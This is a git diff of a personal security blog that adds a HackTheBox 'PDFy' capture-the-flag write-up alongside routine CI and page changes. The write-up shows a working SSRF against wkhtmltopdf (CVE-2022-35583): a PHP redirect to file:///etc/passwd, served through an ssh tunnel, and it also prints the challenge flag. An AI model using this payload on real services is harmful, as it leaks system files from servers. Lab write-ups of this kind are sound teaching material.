Dev

.github/workflows/ci.yaml

@@ -10,7 +10,7 @@ jobs:
       - uses: actions/checkout@v2
       - uses: ruby/setup-ruby@v1
         with:
-          ruby-version: 2.7
+          ruby-version: 3.2
           bundler-cache: true
       - name: build
         run: script/bootstrap

.github/workflows/publish-gem.yml

@@ -0,0 +1,22 @@
+name: Publish Gem
+
+on:
+  release:
+    types: [released]
+
+jobs:
+  release:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v3
+      - name: Setup Ruby
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '3.2'
+      - name: Build gem
+        run: |
+          gem build github-pages.gemspec
+      - name: Publish
+        run: |
+          gem push github-pages.gem --key ${{ secrets.PAGES_GEM_PUBLISH }}

docs/CONTRIBUTING.md

@@ -77,6 +77,9 @@ At a high level, [the process for proposing changes](https://guides.github.com/i
 
 `script/cibuild`
 
+## Publishing Gem
+In order to publish the Gem bump the version in *this file*, commit, create a tag with the new version number, and finally push the commit and tag to the repo.
+
 ## Code of conduct
 
 This project is governed by [the Contributor Covenant Code of Conduct](CODE_OF_CONDUCT.md). By participating, you are expected to uphold this code.

index.md

@@ -5,6 +5,27 @@ layout: default
 <h1>News</h1>
 
 <hr>
+<article>
+  <div style="display: flex;">
+      <div style="flex: 1">
+        <center>
+          <img width="400em" src="data:image/png;base64,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" alt="">
+        </center>
+      </div>
+      <div style="flex: 1">
+        <h2>HackTheBox - PDFy - Writeup</h2>
+        <p>A new writeup for HackTheBox - PDFy is now Available.</p>
+
+        <center>
+          <a href="{{'/pages/writeups/hackthebox/challenges/PDFy/pdfy'}}" class="btn">Check it Out</a>
+        </center>
+
+        <br>
+        <small>25 Apr 2024</small>
+      </div>
+  </div>
+</article>
+
 <article>
   <div style="display: flex;">
       <div style="flex: 1">

pages/writeups.md

@@ -3,6 +3,26 @@ layout: default
 ---
 
 <h2>Writeups</h2>
+<!-- 2024 -->
+<table class="table table-dark caption-top table-striped table-hover text-light text-center">
+    <caption><h3>2024</h3></caption>
+    <thead>
+        <th scope="col">CTF</th>
+        <th scope="col">Category</th>
+        <th scope="col">Challenge</th>
+        <th scope="col">Writeup</th>
+    </thead>
+    <tbody>
+        <tr>
+            <td><a href="https://www.hackthebox.com/">HackTheBox</a></td>
+            <td>Web</td>
+            <td>PDFy</td>
+            <td class="d-flex justify-content-center">
+                <a href="{{'/pages/writeups/hackthebox/challenges/PDFy/pdfy'}}" class="btn">Read</a>
+            </td>
+        </tr>
+    </tbody>
+</table>
 
 <!-- 2023 -->
 <table class="table table-dark caption-top table-striped table-hover text-light text-center">

pages/writeups/hackthebox/challenges/PDFy/pdfy.md

@@ -0,0 +1,57 @@
+---
+layout: post
+author: k0d14k
+---
+
+# HackTheBox - PDFy
+
+---
+
+Tags: `SSRF`, **`CVE-2022-35583`, `localhost.run`**
+
+---
+
+> Welcome to PDFy, the exciting challenge where you turn your favorite web pages into portable PDF documents! It's your chance to capture, share, and preserve the best of the internet with precision and creativity. Join us and transform the way we save and cherish web content! NOTE: Leak /etc/passwd to get the flag!
+> 
+
+In this HackTheBox challenge, We have a website used to dump a PDF based on an existing website:
+
+![Untitled](Untitled.png)
+
+We know that the flag is in the `/etc/passwd` file and when trying to generate a PDF for Google it works correctly.
+
+Let’s see how the PDF request works:
+
+![Untitled](Untitled%201.png)
+
+The request gets a JSON with `url` as a single field and, if the conversion goes as expected a PDF name is returned. Then the PDF is stored in `/static/pdfs/[file name].pdf`.
+
+After some tests, and get some errors as the following one:
+
+![Untitled](Untitled%202.png)
+
+I was sure about one thing: the PDF is made up using the wkhtmltopdf library.
+
+Searching on Google I noticed that there is a CVE over this library: **[CVE-2022-35583](https://github.com/wkhtmltopdf/wkhtmltopdf/issues/5249)**
+
+Then, looking for a PoC I found this useful guide: **[wkhtmltopdf SSRF](https://exploit-notes.hdks.org/exploit/web/security-risk/wkhtmltopdf-ssrf/).**
+
+```php
+<?php
+  header("Location: file:///etc/passwd");
+?>
+```
+
+```php
+php -S 0.0.0.0:8081
+```
+
+```php
+ssh -R 80:localhost:8081 nokey@localhost.run
+```
+
+![Untitled](Untitled%203.png)
+
+---
+
+## Flag: HTB{pdF_g3n3r4t1on_g03s_brrr!}

script/validate-html

@@ -20,7 +20,7 @@ def validate(file)
 
   return puts "Valid!" if results.errors.empty?
 
-  results.errors.each { |err| puts err.to_s }
+  results.errors.each { |err| puts err }
   exit 1
 end